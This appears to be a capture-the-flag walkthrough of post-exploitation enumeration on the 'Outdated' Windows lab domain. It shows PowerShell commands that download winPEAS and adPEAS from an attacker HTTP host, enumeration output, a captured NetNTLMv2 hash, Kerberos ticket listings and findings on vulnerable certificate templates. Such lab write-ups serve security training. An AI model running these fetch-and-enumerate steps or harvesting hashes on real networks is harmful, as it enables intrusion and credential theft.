PEAS
ps c:\Users\btables\Documents> iwr -uri http://10.10.14.23:2222/winPEASx64.exe -Outfile .\winPEASx64.exe
Delivery complete over HTTP
Executing PEAS
Env
���������� User Environment Variables
� Check for some passwords or keys in the env variables
SystemDrive: C:
ProgramFiles(x86): C:\Program Files (x86)
USERDNSDOMAIN: OUTDATED.HTB
ProgramW6432: C:\Program Files
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
TMP: C:\Users\btables\AppData\Local\Temp
PROCESSOR_ARCHITECTURE: AMD64
DriverData: C:\Windows\System32\Drivers\DriverData
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\btables
PROCESSOR_REVISION: 3100
TEMP: C:\Users\btables\AppData\Local\Temp
FPS_BROWSER_APP_PROFILE_STRING: Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING: Default
LOGONSERVER: \\DC
USERNAME: btables
SystemRoot: C:\Windows
OneDrive: C:\Users\btables\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
ProgramData: C:\ProgramData
HOMEPATH: \Users\btables
COMPUTERNAME: CLIENT
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ALLUSERSPROFILE: C:\ProgramData
CommonProgramW6432: C:\Program Files\Common Files
SESSIONNAME: Console
RecommendedLayer: NONE
HOMEDRIVE: C:
windir: C:\Windows
NUMBER_OF_PROCESSORS: 1
OS: Windows_NT
ProgramFiles: C:\Program Files
ComSpec: C:\Windows\system32\cmd.exe
PSModulePath: C:\Users\btables\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROMPT: $P$G
APPDATA: C:\Users\btables\AppData\Roaming
USERDOMAIN: OUTDATED
PROCESSOR_LEVEL: 23
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\btables\AppData\Local\Microsoft\WindowsApps;
LOCALAPPDATA: C:\Users\btables\AppData\Local
PSExecutionPolicyPreference: Bypass
USERDOMAIN_ROAMINGPROFILE: OUTDATED
PUBLIC: C:\Users\Public
���������� System Environment Variables
� Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 1
PROCESSOR_LEVEL: 23
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_REVISION: 3100
LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
UAC
PowerShell
c:\Users\btables\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Drives
PS C:\Users\btables\Documents> dir A:\
dir : Cannot find path 'A:\' because it does not exist.
At line:1 char:1
+ dir A:\
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (A:\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Users\btables\Documents> dir D:\
dir : Cannot find path 'D:\' because it does not exist.
At line:1 char:1
+ dir D:\
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (D:\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
False-Positive
WSUS
KrbRelayUp
NTLM
btables::OUTDATED:1122334455667788:04066798b7e544cc33f395d8d559a152:010100000000000050d7181a2640da014b03e1b8498b8ace000000000800300030000000000000000000000000200000aa2ec91dca5d8667f92f9c6393b2949ae0492bf60efa2397bb21bbde2990dcc00a00100000000000000000000000000000000000090000000000000000000000
GPO
.NET Version
Token Privileges
User Privileges of the
btables
user
AutoLogon
ps c:\Users\btables\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ outdated
DefaultUserName REG_SZ btables
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
userinit reg_sz c:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0xa056900f
ShutdownFlags REG_DWORD 0x8000022b
AutoAdminLogon REG_SZ 1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-1427615864-4097738724-2873505330-1001
LastUsedUsername REG_SZ btables
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
AutoLogon is configured for the btables
user
Credential may be extracted by dumping memory
Modifiable Services
Installed Programs
Scheduled Tasks
Initially found and enumerated at a later stage
SMB
DNS
Kerberos Tickets
���������� Looking for Kerberos tickets
� https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
servername: krbtgt/OUTDATED.HTB
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, pre_authent, renewable, forwarded, forwardable
=================================================================================================
servername: krbtgt/OUTDATED.HTB
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, pre_authent, initial, renewable, forwardable
=================================================================================================
servername: ldap/DC.outdated.htb
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:24:26 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================
servername: cifs/DC
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:24:26 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================
servername: cifs/DC.outdated.htb
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================
adPEAS
PS C:\Users\btables\Documents> iwr -uri http://10.10.14.23:2222/adPEAS.ps1 -Outfile .\adPEAS.ps1
Delivery complete over HTTP
Executing adPEAS
Domain
ms-DS-MachineAccountQuota
ADCS
CA
outdated-DC-CA
EFS
WebServer
ENROLLEE_SUPPLIES_SUBJECT
Machine
User
SubCA
ENROLLEE_SUPPLIES_SUBJECT
SharpHound
Ingestion Complete